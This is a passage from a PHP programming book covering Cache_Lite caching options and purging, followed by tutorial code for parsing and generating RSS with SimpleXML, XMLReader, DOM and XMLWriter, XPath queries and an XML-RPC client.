   value) using PHP’s crc32 function, an MD5 hash using PHP’s md5 function (md5),
   or a simple and fast string length check (strlen). Note that this mechanism is
   not intended to provide security from people tampering with your cache files;
   it’s just a way to spot corrupt files.

pearErrorMode
   This option tells Cache_Lite how it should return PEAR errors to the calling
   script. The default is CACHE_LITE_ERROR_RETURN, which means Cache_Lite will
   return a PEAR::Error object.

memoryCaching
   With memory caching enabled, every time a file is written to the cache, it is
   stored in an array in Cache_Lite. The saveMemoryCachingState and
   getMemoryCachingState methods can be used to store and access the memory
   cache data between requests. The advantage of this facility is that the complete
   set of cache files can be stored in a single file, reducing the number of disk
   read/write operations by reconstructing the cache files straight into an array to
   which your code has access. The memoryCaching option may be worth further
   investigation if you run a large site. The default value is false (disabled).
388   The PHP Anthology

      onlyMemoryCaching
         If this option is enabled, only the memory caching mechanism will be used.
         The default value is false (disabled).

      memoryCachingLimit
         This option places a limit on the number of cache files that will be stored in
         the memory caching array. The more cache files you have, the more memory
         will be used up by memory caching, so it may be a good idea to enforce a limit
         that prevents your server from having to work too hard. Of course, this option
         places no restriction on the size of each cache file, so just one or two massive
         files may cause a problem. The default value is 1000.

      automaticSerialization
         If enabled, this option will automatically serialize all data types. While this
         approach will slow down the caching system, it is useful for caching nonscalar
         data types such as objects and arrays. For higher performance, you might con­
         sider serializing nonscalar data types yourself. The default value is false (dis­
         abled).

      automaticCleaningFactor
         This option will automatically clean old cache entries—on average, one in x
         cache writes, where x is the value set for this option. Therefore, setting this
         value to 0 will indicate no automatic cleaning, and a value of 1 will cause cache
         clearing on every cache write. A value of 20 to 200 is the recommended starting
         point if you wish to enable this facility; it causes cache cleaning to happen, on
         average, 0.5% to 5% of the time. The default value is 0 (disabled).

      hashedDirectoryLevel
         When set to a nonzero value, this option will enable a hashed directory structure.
         A hashed directory structure will improve the performance of sites that have
         thousands of cache files. If you choose to use hashed directories, start by setting
         this value to 1, and increasing it as you test for performance improvements. The
         default value is 0 (disabled).

      errorHandlingAPIBreak
         This option was added to enable backwards compatibility with code that uses
         the old API. When the old API was run in CACHE_LITE_ERROR_RETURN mode
         (see the pearErrorMode option earlier in this list), some functions would return
Caching     389

    a Boolean value to indicate success, rather than returning a PEAR_Error object.
    By setting this value to true, the PEAR_Error object will be returned instead.
    The default value is false (disable).


How do I purge the Cache_Lite cache?
The built-in lifetime mechanism for Cache_Lite cache files provides a good
foundation for keeping your cache files up to date, but there will be some circum­
stances in which you need the files to be updated immediately.

Solution
In cases in which you need immediate updates, the methods remove and clean
come in handy. The remove method is designed to delete a specific cache file; it
takes as arguments the cache ID and group name of the file. To delete the page body
cache file we created in “How do I use PEAR::Cache_Lite for server-side caching?”,
we’d use this code:

 $cache->remove('body', 'Dynamic');



If we use the clean method, we can delete all the files in our cache directory simply
by calling the method with no arguments; alternatively, we can specify a group of
cache files to delete. If we wanted to delete both the header and footer cache files
we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we could
do so like this:

 $cache->clean('Static');



Discussion
The remove and clean methods should obviously be called in response to events
that arise within an application. For example, if you have a discussion forum ap­
plication, you probably want to remove the relevant cache files when a visitor posts
a new message.

Although it may seem like this solution entails a lot of code modifications, with
some care it can be applied to your application in a global manner. If you have a
central script that’s included in every page, your script can simply watch for incom­
ing events—for example, a variable like $_GET['newPost']—and respond by deleting
390   The PHP Anthology

      the required cache files. This keeps the cache file removal mechanism central and
      easier to maintain. You might also consider using the php.ini setting auto_pre­
      pend_file to include this code in every PHP script.


      How do I cache function calls?
      Many web sites provide access to their data via web services such as SOAP and
      XML-RPC.9 As web services are accessed over a network, it’s often a very good idea
      to cache results so that they can be fetched locally, rather than repeating the same
      slow request to the server multiple times. A simple approach might be to use PHP
      sessions, but as that solution operates on a per-visitor basis, the opening requests
      for each visitor will still be slow.

      Solution
      Let’s assume you wish to create a web page that lists all the SitePoint books available
      on Amazon. The actual list is not likely to change from moment to moment, so why
      would we make the request to the Amazon web service every time the web page is
      displayed? We won’t! Instead, we can take advantage of Cache_Lite by caching the
      results of the XML-RPC request.


                 Requires PEAR::SOAP Version 0.11.0
               The following solution uses the PEAR::SOAP library version 0.11.0 to access the
               Amazon web service. You can find this package on the PEAR web site.10


      Here’s some hypothetical code that fetches the data from the remote Amazon server:

          $results = $amazonClient->ManufacturerSearchRequest($params);



      Using Cache_Lite_Function, we can cache the results so the data returned from
      the service can be reused; this will avoid unnecessary network calls and significantly
      improve performance.

      The following example code focuses on the caching aspect to prevent us from getting
      bogged down in the details of using the Amazon web service. You can see the


      9
          You can read all about web services in Chapter 12.
      10
           http://pear.php.net/package/soap/
Caching     391

complete script if you download this book’s code archive from the SitePoint web
site.

The Cache_Lite_Function requires the inclusion of the following file:

                                                             cachefunction.php (excerpt)

   require_once 'Cache/Lite/Function.php';



We instantiate the Cache_Lite_Function class with some options:

                                                             cachefunction.php (excerpt)

   $options = array(
     'cacheDir' => './cache/',
     'fileNameProtection' => true,
     'writeControl' => true,
     'readControl' => true,
     'readControlType' => 'strlen',
     'defaultGroup' => 'SOAP'
   );
   $cache = new Cache_Lite_Function($options);



It’s important that the fileNameProtection option is set to true (this is in fact the
default value, but in this case I’ve set it manually to emphasize the point). If it were
set to false, the filename would be invalid, so the data will not be cached.

Here’s how we make the calls to our SOAP client class:

                                                             cachefunction.php (excerpt)

 $results = $cache->call('amazonClient->ManufacturerSearchRequest',
     $params);



If the request is being made for the first time, Cache_Lite_Function will store the
results as a serialized array or object in a cache file (not that you need to worry
about this), and this file will be used for future requests until it expires. The
setLifeTime method can again be used to specify how long the cache files should
survive before they’re refreshed; currently, the default value of 3600 seconds (one
hour) is being used. You can then use the $results variable exactly as if you were
392   The PHP Anthology

      calling the web service method directly. The output of our example script can be
      seen in Figure 11.1.




                                  Figure 11.1. SitePoint books at Amazon


      Summary
      Caching is an important and often overlooked aspect of web site development. Many
      factors that affect the performance of today’s web sites weren’t a problem for their
      predecessors—from complex, dynamic page generation, to a reliance on third-party
      data over the network. In this chapter, we’ve examined HTML meta tags, HTTP
      headers, PHP output buffering and PEAR::Cache_Lite, and we’ve seen how you
      can use them to control the caching of your web site content and improve the site’s
      reliability and performance.
Caching     393

Implementing a caching system for your site might be simple, but ultimately, it
depends on your requirements. If you have a busy and predominantly static web
site—such as a blog—that’s managed through a content management system, it will
likely require little alteration, yet may benefit from huge performance improvements
resulting from a small investment of your time. Setting up caching for a more com­
plex site that generates content on a per-user basis, such as a portal or shopping
cart system, will prove a little more tricky and time consuming, but the benefits are
still clear. Regardless, I hope the information in this chapter has given you a good
grasp of the options available, and will help you determine which techniques are
most suitable for your application.
The PHP Anthology
12
                                    Chapter




XML and Web Services
Probably the single biggest addition to PHP 5 following the changes in the object
oriented programming model was the rewriting of the DOM XML extension, the
addition of the SimpleXML extension, and the addition of the SOAP extension.
PHP 5.1 introduced two new XML extensions, XMLReader and XMLWriter.

XML and web services are broad topics when viewed within the realm of PHP, due
to the number of facilities that are available for producing and consuming XML.
Entire books have been devoted to them.1 In this chapter, we’ll explore useful
solutions for handling some of the more common XML-related tasks, as well as for
consuming and serving XML-based web services; the rest is up to you!


        Using the Zend Framework
      A number of examples in this chapter utilize components from the Zend Frame­
      work.2 Installation of the framework is simple: download the appropriate format



1
  Two good sources include Rob Richards’s Pro PHP XML and Web Services (Berkeley: Apress, 2006),
and Thomas Myer’s No Nonsense XML Web Development With PHP (Melbourne: SitePoint, 2005).
2
  http://framework.zend.com/
396   The PHP Anthology

               from http://framework.zend.com/download/, extract the archive, and update your
               include_path to point to the library directory of the installation.



      Which XML technologies are
      available in PHP 5?
      PHP 5 offers a number of new XML extensions. You can read about what’s new in
      the Zend Developer Network article, “XML in PHP 5: What’s New?”3

      Solution
      Table 12.1 summarizes the XML extensions available in PHP 5.


      Why should I use PHP’s XML extensions
      instead of PHP string functions?
      If XML is primarily a text format, why would we bother using the XML extensions?
      Why wouldn’t we simply concatenate strings to create documents, or use regular
      expressions to parse them?

      Solution
      The answer to this question is: for reasons of performance, compatibility, flexibility,
      and ease of use.

      Certainly, XML documents can be parsed using a series or regular expressions.
      However, the PCRE engine is fairly heavyweight, and isn’t optimized for such tasks.
      Tools such as SimpleXML and XMLReader allow you to iterate through a document
      with ease, grabbing only the content you need without ever once writing a regular
      expression. Using SAX, you can trigger code to execute as particular elements are
      found in the document. XSL can be used to transform XML documents into other
      XML documents, XHTML, SQL, and more.




      3
          http://devzone.zend.com/node/view/id/1713/
XML and Web Services          397

Table 12.1. XML Extensions in PHP

  Extension                         Purpose                                More Information
SAX           This set of PHP functions was designed for creating     http://www.php.net/xml/
              XML parsers and XML event handlers. It has been
              available since PHP 4 and is enabled by default.
DOM           This OOP extension allows you to operate on or create   http://www.php.net/dom/
              an XML document using the Document Object Model,
              or DOM. It has been available since PHP 5.0.0 and is
              enabled by default.
XPath         Built into the DOM extension, XPath allows you to
              perform queries on your XML documents. It’s been
              available as part of the DOM extension since PHP
              5.0.0.
XSL           An OOP extension for performing Extensible              http://www.php.net/xsl/
              Stylesheet Language Transformations (XSLT) on DOM
              documents, XSL has been available since PHP 5.0.0.
              It can be enabled by sending the --with-xsl
              argument to the compiler.
SimpleXML     An OOP tool set used to convert XML to iterable         http://www.php.net/simplexml/
              objects, and thus allow the processing of XML using
              normal property selectors and array access. Available
              since PHP 5.0.0, SimpleXML is enabled by default;
              some features vary between PHP versions.

XMLReader     An OOP extension for iterating through an XML           http://www.php.net/xmlreader/
              stream a node at a time, XMLReader has been
              available in PECL since PHP 5.0.0, and enabled by
              default since PHP 5.1.0.

XMLWriter     This hybrid extension uses either function or OOP       http://www.php.net/xmlwriter/
              access to create XML documents. Available in PECL
              since PHP 5.1.0, it has been enabled by default since
              PHP 5.1.4. Enable it by sending the
              --with-xmlwriter argument to the compiler
              in previous versions.
398   The PHP Anthology

        Extension                         Purpose                                 More Information
       XML-RPC      A set of functions that allow developers to encode       http://www.php.net/xmlrpc/
                    and decode XML-RPC values and create XML-RPC
                    servers that use PHP functions and callbacks to
                    handle requests, XML-RPC has been available since
                    PHP 4.1.0. Enable it by sending the
                    --with-xmlrpc argument to the compiler.
       SOAP         The SOAP extension allows developers to create SOAP      http://www.php.net/soap/
                    clients or servers easily, and to bind objects or
                    functions to the client or server. Available since PHP
                    5.0.0, it can be enabled by sending the
                    --with-soap argument to the compiler.


      Discussion
      XML documents may easily be written as the standard output of an application, or
      by concatenating strings. However, you then need to worry about character encoding
      issues, character typos that may affect document validity, and more. You can avoid
      these issues using tools such as the DOM or XMLWriter extensions.


      How do I parse an RSS feed?
      RSS is becoming a ubiquitous Web technology—most sites offer RSS feeds of their
      updated content, and many use this as a means to communicate with users. How
      can you incorporate RSS feeds from other sites on your own?

      Solutions
      SimpleXML makes parsing XML as easy as traversing an object: instead of needing
      to check for the element’s position, name, and type, we simply access the element.
      To do so, though, we need to know something about the structure of the XML we’re
      parsing; RSS, since it’s a published standard, is easy to parse using SimpleXML.

      One thing to remember with SimpleXML is that if you want the actual value of a
      property you’re accessing, you must cast it to the appropriate type first; otherwise,
      you’ll receive the SimpleXMLElement representing the value. In the following ex­
      ample, we use the simplexml_load_file function to load the RSS from the
      sitepoint.com blogs feed and output the content of some of the elements:
XML and Web Services         399

                                                              simplexml.php (excerpt)

 $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
 $xml = simplexml_load_file($url);
 $channel = $xml->channel;
 echo "Title: ", (string) $channel->title, "n",
     "Description: ", (string) $channel->description, "n",
     "Link: ", (string) $channel->link, "n";
 foreach ($channel->item as $item)
 {
   echo "Item: ", (string) $item->title, "n",
       "Link: ", (string) $item->link, "n",
       "Description:n", (string) $item->description, "n";
 }



The SimpleXML solution provided above is just one of several approaches you may
use with PHP 5. Let’s take a quick look at some other possibilities that exemplify
the elegance of SimpleXML.

Parsing XML with XMLReader
XMLReader is a newcomer on the PHP scene, having only become available since
PHP 5.1.0. It allows iterative access to XML documents using object oriented nota­
tion. However, it is more in the class of SAX than DOM or SimpleXML, as it provides
a more programmatic way to process the document.

In this example, we'll build a class—Rss_XmlReader—to encapsulate the functions
we need to parse an RSS feed using XMLReader. First, we define some class properties
and the constructor method:

                                                     Rss_XmlReader.class.php (excerpt)

 class Rss_XmlReader
 {
   public $channelTitle = '';
   public $channelDesc = '';
   public $channelLink = '';
   public $items = array();
   public $xml;
   public function __construct($url = null)
   {
     if (null !== $url)
400   The PHP Anthology


           {

             $this->load($url);

           }

         }




      The first three of these properties hold the RSS channel information, the $items
      array will hold all the RSS items from the specified feed, and $xml will hold the
      feed’s raw XML source. The constructor takes one argument: the URL of the RSS
      feed.

      If a URL is provided to the constructor, we’ll load and parse it immediately. Here’s
      what the load method looks like:

                                                           Rss_XmlReader.class.php (excerpt)

         public function load($url)
         {
           $this->xml = file_get_contents($url);
           $xr = new XMLReader();
           $xr->XML($this->xml);
           $this->channelTitle = '';
           $this->channelDesc = '';
           $this->channelLink = '';
           $this->items = array();
           while ($xr->read())
           {
             if (XMLReader::ELEMENT == $xr->nodeType)
             {
               switch ($xr->localName)
               {
                 case 'channel':
                   $this->_getChannelInfo($xr);
                   break;
                 case 'item':
                   $this->_getItem($xr);
                   break;
               }
             }
           }
         }
XML and Web Services         401

Using file_get_contents, we retrieve the raw XML source, instantiate a new
XMLReader, and begin to read the RSS feed. As I mentioned previously, XMLReader
requires us to iterate through every node of the document—including the text ele­
ments of an XML node. During the load routine, we go through the top-level element
nodes of the document, and, if the current node is a channel, we read the channel
information. If it’s an item element, we read the details of the item.

The _getChannelInfo method reads the channel information from the channel
element:

                                                    Rss_XmlReader.class.php (excerpt)

   protected function _getChannelInfo($xr)
   {
     while ($xr->read() && ($xr->depth == 2))
     {
       if (XMLReader::ELEMENT == $xr->nodeType)
       {
         switch ($xr->localName)
         {
           case 'title':
             $xr->read();
             $this->channelTitle = $xr->value;
             break;
           case 'description':
             $xr->read();
             $this->channelDesc = $xr->value;
             break;
           case 'link':
             $xr->read();
             $this->channelLink = $xr->value;
             break;
         }
       }
     }
   }



Parsing the channel information requires that we pluck the appropriate nodes out
of the channel element, including the channel title, description, and link, and
store them in the appropriate object properties.
402   The PHP Anthology

      Parsing an item is really no different from parsing the channel information—we
      grab one item element at a time. The only difference is that the information is stored
      in the $items array for later iteration:

                                                            Rss_XmlReader.class.php (excerpt)

           protected function _getItem($xr)
           {
             $title = '';
             $link = '';
             $desc = '';
             $date = '';
             while ($xr->read() && ($xr->depth > 2))
             {
               if (XMLReader::ELEMENT == $xr->nodeType)
               {
                 switch ($xr->localName)
                 {
                   case 'title':
                     $xr->read();
                     $title = $xr->value;
                     break;
                   case 'description':
                     $xr->read();
                     $desc = $xr->value;
                     break;
                   case 'link':
                     $xr->read();
                     $link = $xr->value;
                     break;
                   case 'date':
                     $xr->read();
                     $date = $xr->value;
                     break;
                 }
               }
             }
             $this->items[] = array(
               'title' => $title,
               'link' => $link,
               'desc' => $desc,
               'date' => $date
             );
           }
       }
XML and Web Services        403

Here is an example of our class in use:

                                                                      xmlreader.php (excerpt)

    <?php
    require_once 'Rss_XmlReader.class.php';

    $rss = new Rss_XmlReader(
        'http://rss.sitepoint.com/f/sitepoint_blogs_feed');
    echo "Title: ", $rss->channelTitle, "n",
        "Description: ", $rss->channelDesc, "n",
        "Link: ", $rss->channelLink, "n";
    foreach ($rss->items as $item)
    {
      echo "Item: {$item['title']}nLink: "
          . "{$item['link']}nDescription:n{$item['desc']}n";
    }
    ?>



Now that all this work is done, we finally have the equivalent of the simple solution
we presented earlier with SimpleXML. Unfortunately, we’ve also done a lot more
work.

SimpleXML with Zend_Feed
RSS feeds are not the only feeds available, and you might want to access multiple
feed types in a similar fashion. Zend_Feed, a component of the Zend Framework,
offers a unified interface to both RSS and Atom feeds.4 It’s basically a class that
uses SimpleXML, but simplifies the process of retrieving the values by eliminating
the need to cast them to the appropriate type. Here’s an example:

                                                                       zendfeed.php (excerpt)

    require_once 'Zend/Feed/Rss.php';
    $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
    $channel = new Zend_Feed_Rss($url);
    // Use function syntax to grab properties as values
    echo "Title: ", $channel->title(), "n",
        "Description: ", $channel->description(), "n",
        "Link: ", $channel->link(), "n";



4
    For Zend_Feed documentation, see http://framework.zend.com/manual/en/zend.feed.html.
404   The PHP Anthology


       foreach ($channel as $item)

       {

         echo "Item: ", $item->title(), "n",

             "Link: ", $item->link(), "n",

             "Description:n", $item->description(), "n";

       }




      Discussion
      As you can see, using SimpleXML or Zend_Feed is much simpler than creating your
      own parser, as we did when we used XMLReader. The approach that uses Zend_Feed
      doesn’t differ much from that which used SimpleXML; it simply eliminates the
      need to perform type casting. So, why would we bother with XMLReader?

      In the days of PHP 4, the parsing of XML in formats such as RSS feeds was almost
      always done in SAX, if it wasn’t done using simple regular expressions. The DOM
      XML extension was a latecomer on the PHP 4 scene and wasn’t included in the core
      distribution, and thus did not gain much popularity amongst PHP 4 users. In addi­
      tion, most PHP 4 books demonstrated XML parsing using SAX, which led many
      developers to use SAX whenever XML parsing was required.

      Things have changed, however, and we now have a plethora of options for parsing
      XML in PHP 5.

      SAX is still a good option if you’re parsing large documents, as it parses element
      by element, allowing PHP to keep a low memory footprint. However, since it does
      parse element by element, and requires the developer to define callbacks practically
      at a per-element level, it’s rather unintuitive to use, and developers tend to end up
      mired in the details of keeping track of element names and references. If you thought
      the XMLReader example above was difficult to follow, a SAX example would have
      had you completely lost.

      XMLReader combines the low-memory footprint benefits of SAX with some of the
      simplicity of SimpleXML. Like SAX, XMLReader uses a pull technology, which
      means it parses the document incrementally as it reads it. Unlike SAX, however,
      you don’t have to specify handlers for elements; it’s actually relatively simple to
      parse through a document in a single loop. The main benefit of using XMLReader is
      performance; since XMLReader operates on a stream instead of pulling the entire
XML and Web Services         405

XML document into memory, it can achieve a lot of processing with a small memory
footprint.

DOM functions can also be used to navigate XML.5 This option has one feature that
makes it an excellent choice for many: XPath integration. XPath allows you to search
for nodes within the document by path—an excellent technique for those times
when you want to pull data selectively from an XML document. However, the DOM
functions make it relatively difficult to loop over elements with the ease that Sim­
pleXML presents; they’re simply overkill for a situation as simple as parsing an RSS
feed. Use DOM when you need to do more complex tasks, such as modifying XML
documents in place.

The best answer to the question of how to parse XML is to use SimpleXML, or a
library wrapping it, such as Zend_Feed. The simplicity of treating an XML document
like a native PHP object cannot be overstated. In addition, because it builds on the
DOM extension, it has built-in XPath support, and at any point you can convert a
                                                                                 6
SimpleXMLElement to a DOMElement using the dom_import_simplexml function.


How do I generate an RSS feed?
While it’s great to know how to parse RSS feeds, at some point, you’ll undoubtedly
want to generate your own. What XML technologies can you use with PHP 5 to
generate an RSS feed?

Solutions
All these solutions use the following data definition with which to generate the
RSS feed (you can find the complete file in the code archive):

                                                           rsssource.php.inc (excerpt)

    $baseUrl = 'http://example.com/extensions/xml/';
    $extensions = array(
      1 => array(
        'title'       => 'SAX',
        'description' => 'ext/xml provides a SAX XML parser generator',
        'link'        => $baseUrl . 'sax'



5
    http://www.php.net/dom/
6
    http://www.php.net/dom_import_simplexml/
406   The PHP Anthology


         ),

         2 => array(
           'title'       => 'DOM',
           'description' => 'The DOM extension provides an implementation
            ➥ of DOM, the Document Object Model',
           'link'        => $baseUrl . 'dom'
         ),

         3 => array(

           'title'       => 'XPath',

           'description' => 'XPath is used to query XML documents for

            ➥ elements',
           'link'        => $baseUrl . 'xpath'

         )

       ⋮ more array items follow…
       );




      Because of its ability to map object properties to XML elements, SimpleXML makes
      it very easy to generate XML documents quickly:

                                                             rss_simplexml.php (excerpt)

       require 'rsssource.php.inc';
       $rss = new SimpleXMLElement(
           '<?xml version="1.0" encoding="UTF-8" ?>' .
           '<rss version="2.0"></rss>');
       $rss->addChild('channel');
       $rss->channel->addChild('title', 'PHP XML Extensions');
       $rss->channel->addChild('description',
           'Information and examples for using the PHP XML extensions');
       $rss->channel->addChild('link',
           'http://example.com/extensions/xml/');
       foreach ($extensions as $extension)
       {
         $item = $rss->channel->addChild('item');
         $item->addChild('title', $extension['title']);
         $item->addChild('description', $extension['description']);
         $item->addChild('link', $extension['link']);
       }
       echo $rss->asXML();



      We previously used SimpleXML to parse XML; in PHP 5.1.3 and versions above, it
      can also be used to generate XML (instead of simply modifying existing XML). It
XML and Web Services       407

doesn’t offer the full set of tools that the DOM makes available, but you can always
convert your SimpleXMLElement to a DOMElement using dom_import_simplexml.

As with the task of parsing XML, there’s more than one way to generate XML; other
options include DOM and XMLWriter.

Generating XML Using the DOM
DOM, the Document Object Model, allows you to traverse XML in a tree-like
structure, looking down the tree at child nodes, up the tree at parent nodes, and
horizontally at sibling nodes. Since it supports the entire breadth of XML, the DOM
is an excellent all-around choice for generating XML structures:

                                                               rss_dom.php (excerpt)

 require 'rsssource.php.inc';
 $document = new DOMDocument('1.0', 'UTF-8');
 $rss = $document->createElement('rss');
 $rss->setAttribute('version', '2.0');
 $channel = $document->createElement('channel');
 $title = $document->createElement('title', 'PHP XML Extensions');
 $description = $document->createElement('description',
     'Information and examples for using the PHP XML extensions');
 $link = $document->createElement('link',
     'http://example.com/extensions/xml/');
 $channel->appendChild($title);
 $channel->appendChild($description);
 $channel->appendChild($link);
 foreach ($extensions as $extension)
 {
   $item = $document->createElement('item');
   $title = $document->createElement('title', $extension['title']);
   $description = $document->createElement('description',
       $extension['description']);
   $link = $document->createElement('link', $extension['link']);
   $item->appendChild($title);
   $item->appendChild($description);
   $item->appendChild($link);
   $channel->appendChild($item);
 }
 $rss->appendChild($channel);
 $document->appendChild($rss);
 echo $document->saveXML();
408   The PHP Anthology

      Generating XML Using XMLWriter
      XMLWriter is a cousin to XMLReader. It allows you to iteratively write XML docu­
      ments, element by element, and to write either in-memory or directly to a URL.7
      The XMLWriter interface can be accessed using either OOP or procedural function
      calls:

                                                                               rss_xmlwriter.php (excerpt)

          require 'rsssource.php.inc';
          $xw = new xmlWriter();
          $xw->openMemory(); // use openUri() to output directly to a file
          $xw->startDocument('1.0', 'UTF-8');
          $xw->startElement('rss');
          $xw->startElement('channel');
          $xw->writeElement('title', 'PHP XML Extensions');
          $xw->writeElement('description',
              'Information and examples for using the PHP XML extensions');
          $xw->writeElement('link', 'http://example.com/extensions/xml/');
          foreach ($extensions as $extension)
          {
            $xw->startElement('item');
            $xw->writeElement('title', $extension['title']);
            $xw->writeElement('description', $extension['description']);
            $xw->writeElement('link', $extension['link']);
            $xw->endElement(); // item
          }
          $xw->endElement(); // channel
          $xw->endElement(); // rss
          $xml = $xw->outputMemory(true);
          echo $xml;



      Discussion
      While probably the easiest solutions for generating XML are simply to concatenate
      strings or to use a templating system, both have a significant drawback: they make
      it very easy to mix character encodings accidentally or to introduce extraneous tags
      or reserved XML entities, and thus end up with invalid XML. The better solution




      7
          For an in-depth explanation of XMLWriter, check out php|architect’s May 2006 issue, which has
      an article entitled "XMLWriter," by Rob Richards, author of the extension.
XML and Web Services         409

is to use one of DOM, SimpleXML, or XMLWriter extensions, which take care of
those problems automatically.

XMLWriter is a relatively new extension that can be very useful if you’re generating
XML content sequentially. It’s a great choice if you have a fairly flat tree structure,
as this approach is almost as easy as concatenating strings or using a template system,
yet it protects you against encoding issues and improperly formed XML. XMLWriter
is also a great choice if you’re creating large documents, as it has the ability to write
documents directly to disk instead of keeping them in memory. This approach helps
prevent the kinds of memory issues found in the more heavyweight extensions,
such as DOM and SimpleXML, that operate entirely in memory. On the downside,
you have to close your own elements and keep track of where you are in the tree in
order to use this functionality. Your best bet is to use code indentation and comments
to keep track of where you are in the tree.

DOM allows you to build your documents from the inside out, and vice versa.
However, you’ll quickly become bogged down trying to remember which node
you’re in and whether or not it has children or a parent, because you need to operate
on individual DOMElements. There’s no easy way to view the overall tree structure
from your code. As a result, it’s probably best to use the DOM when you need to
modify existing XML.

As we’ve seen in these examples, SimpleXML allows you to build XML documents
as well as read them. Its object mapping of XML makes it very easy to create visual
trees in your code, and its ties to the DOM mean that once you’ve created the
structure, you can easily manipulate the document using DOM to set the encoding
and namespaces as necessary. The combination of SimpleXML and DOM should
become the Swiss Army Knife of your XML toolbox in PHP 5.


How do I search for a node
or content in XML?
Often, you only need a few pieces of information from a particular XML document.
Should you parse the entire document to find those elements? What if, for example,
all you need is a set of siblings that share a given element name?
410   The PHP Anthology


      Solution
      The solution is easy: use XPath. XPath, the XML Path Language, allows you to
      search the logical structure of a document using a URL-like path notation. It was
      originally developed to aid in XSL transformations, but has many other uses. The
      DOM extension has built-in support for XPath; so does SimpleXML. Here’s an ex­
      ample that uses the DOM extension:

                                                                 xpath_dom.php (excerpt)

       $doc = new DOMDocument;
       $doc->preserveWhiteSpace = false;
       $doc->load('http://rss.sitepoint.com/f/sitepoint_blogs_feed');
       $xpath = new DOMXPath($doc);

       $titles = $xpath->query('//item/title');
       foreach ($titles as $title)
       {
           echo $title->nodeValue, "n";
       }



      This example loads the SitePoint blog feed and uses the XPath query //item/title
      to select the title elements from all the item elements.

      Here's a similar solution using SimpleXML:

                                                            xpath_simplexml.php (excerpt)

       $doc = new SimpleXMLElement(
           'http://rss.sitepoint.com/f/sitepoint_blogs_feed',
           null,
           true    // tell SimpleXML that we're supplying a URL
       );
       // search for titles with an item parent
       foreach ($doc->xpath('//item/title') as $title)
       {
           echo $title, "n";
       }
XML and Web Services   411


Discussion
XPath could easily be the subject of an entire chapter, or even a book. The following
discussion serves only as the briefest of introductions; for full documentation on
the subject, check out the XPath specification at the W3C.8 9

XPath operates under a number of rules, the most basic of which is that the forward
slash, /, is used as a path separator between different levels in the XML tree hier­
archy. In the examples above, we were looking only for title nodes that were children
of item elements: item/title. In order to tell XPath that this is a relative path, and
that we don’t want to start the search from the root node, we prefix the path with
double slashes, //. The same data could have been queried using a full path to the
elements, /rss/channel/item/title.

The most basic rules for using XPath are:

■	 A forward slash, /, is a path separator.
■	 An absolute path from the root starts with a single forward slash, /.
■	 A relative path from a given location can start with anything else.
■	 A relative path matching elements at any depth of the document starts with two
   forward slashes, //.
■	 A double period, .., indicates the parent of a node.
■	 A single period, ., indicates the current node.

XPath also allows you to match against element attributes, specific items within a
set of results, and even element values:

■	 Match values using [NODE=””], where NODE is a node name or indicator (such
   as . or ..).
■	 Match attributes using @ATTR, either as part of the path expression, or as a mod­
   ifier to the node (for example item/@type, item[@type], item[@type='']).
■	 Match a specific element in a returned list of nodes using brackets (for example,
   //item/title[2]); note that indices start at 1.




8
 http://www.w3.org/TR/xpath/

9
 Sun also has an excellent XPath tutorial available at

http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JAXPXSLT3.html.
412   The PHP Anthology

      As an example, on the day I write this, the SitePoint Blogs RSS feed presents an
      item with the title, “News Wire: Liquid vs. Fixed.” To grab this item element, I can
      use the following code:

       // assuming $doc is a SimpleXMLElement

       $item = $doc->xpath(

           '//item/title[.="News Wire: Liquid vs. Fixed"]/..'); 



      Those lines return to me the item node and its children by matching:

      ■	 all item elements (//item)
      ■	 that have a title element (/title)
      ■	 with a value of “News Wire: Liquid vs. Fixed” ([.="News Wire: Liquid vs.
         Fixed"])
      ■	 and return the parent item element(/..)

      Several wildcards are also allowed:

      ■	 * matches any element node (not a text or attribute node).
      ■	 node() matches any type of node.
      ■	 @* matches any attribute.

      XPath has much more to offer, including operators and a set of functions for
      matching and manipulating strings in the path. If you find yourself needing to search
      your XML documents, XPath is a good skillset to have at your disposal.


      How can I consume XML-RPC web services?
      XML-RPC is an XML-based protocol for performing remote procedure calls—basic­
      ally, the process of calling functions and methods on a remote machine. The XML­
      RPC specification defines a simple structure for calling a method on a server with
      one or more parameters of given types; a single value is returned—just like a PHP
      function.10 For more information on XML-RPC, visit the official XML-RPC web
      site.11




      10
           http://www.xmlrpc.com/spec/
      11
           http://www.xmlrpc.com/
XML and Web Services         413

XML-RPC also uses the concept of namespaces. Namespaces allow a single server
to serve several groups of related methods in a way that ensures that method name
collisions do not occur. A prototype XML-RPC method call might look like this:

 struct lookup.state(string)



This call indicates that the state method of the lookup namespace expects a string
as an argument, and returns a struct (associative array) as a response. An actual call,
using Zend Framework’s Zend_XmlRpc_Client, might look like this:

 $info = $client->lookup->state('Vermont');



XML-RPC is the grand-daddy of web services, and its simplicity is appealing to
many developers; with the clients available in most languages, we simply pass in
native values, and receive a native value as a response.

So, now you know about XML-RPC; how can you consume an XML-RPC service?

Solution
The Zend Framework offers an XML-RPC implementation that includes both a client
and server. Its interface is entirely object oriented, making it a good choice for OOP
enthusiasts; in particular, the ability to chain namespaces leading to a method makes
it incredibly intuitive to use. As an example, here’s a simple XML-RPC client script
that uses the XML-RPC server in “How do I serve my own XML-RPC web services?”.
The server exposes a math namespace with two methods, add and multiply:

                                                        zend_xmlrpc_client.php (excerpt)

 require_once 'Zend/XmlRpc/Client.php';
 try
 {
   $client = new Zend_XmlRpc_Client(
       'http://localhost/phpant2/chapter_12/examples/' .
       'zend_xmlrpc_serv.php');
   $proxy = $client->getProxy();
   $add = $proxy->math->add(array(1,2));
   $mult = $proxy->math->multiply(array(21343243346,989554365486));
   echo '1 + 2 = ' . $add . "<br />";
   echo '21343243346 * 989554365486 = ' . $mult;
 }
414   The PHP Anthology


